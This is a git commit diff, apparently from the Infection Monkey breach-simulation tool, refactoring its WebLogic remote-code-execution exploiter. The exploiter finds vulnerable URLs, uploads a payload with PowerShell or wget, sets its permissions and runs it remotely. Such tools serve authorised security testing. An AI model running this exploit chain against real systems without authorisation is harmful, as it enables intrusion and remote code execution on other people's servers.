Webblogic refactored to web RCE framework changes(from static methods into class methods)

2018-08-17 13:46:14 +03:00 · 2018-08-17 13:46:14 +03:00 · 10528c313d
parent 66bc852742
commit 10528c313d
1 changed files with 10 additions and 18 deletions
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@ -10,7 +10,7 @@ from requests import post, exceptions
 from web_rce import WebRCE
 from exploit.tools import get_free_tcp_port, get_interface_to_target
 from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
-from model import POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED, WGET_HTTP_UPLOAD
+from model import POWERSHELL_HTTP_UPLOAD, WGET_HTTP_UPLOAD

 import threading
 import logging
@ -46,17 +46,17 @@ class WebLogicExploiter(WebRCE):
    _TARGET_OS_TYPE = ['linux', 'windows']

    def __init__(self, host):
-        super(WebLogicExploiter, self).__init__(host)
+        super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
+                                                       'win32': 'monkey-32.exe',
+                                                       'win64': 'monkey-64.exe'})

    def exploit_host(self):
        # Get open ports
-        ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"])
+        ports = self.get_ports_w(self.HTTP, ["http"])
        if not ports:
            return False
        # Get urls to try to exploit
-        urls = WebRCE.build_potential_urls(self.host, ports, URLS)
-
-        exploiter = self.exploit
+        urls = self.build_potential_urls(ports, URLS)

        # Checking takes a lot of time, so we check until we get exploitable url and stop
        vulnerable_urls = []
@ -69,24 +69,16 @@ class WebLogicExploiter(WebRCE):
        if not vulnerable_urls:
            return False

-        # Somehow we can't save files outside server's directory
-        config = copy.deepcopy(self._config)
-        config.dropper_target_path_win_32 = 'monkey-32.exe'
-        config.dropper_target_path_win_64 = 'monkey-64.exe'
-        config.dropper_target_path_linux = './monkey.sh'
-
-        data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0],
-                                    {'windows': POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED,
-                                     'linux': WGET_HTTP_UPLOAD})
+        data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})

        # We can't use 'if not' because response may be ''
-        if not data or data['response'] == False:
+        if not data or data['response'] is False:
            return False

-        if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
+        if self.change_permissions(vulnerable_urls[0], data['path']) is False:
            return False

-        if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], False) == False:
+        if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
            return False

        return True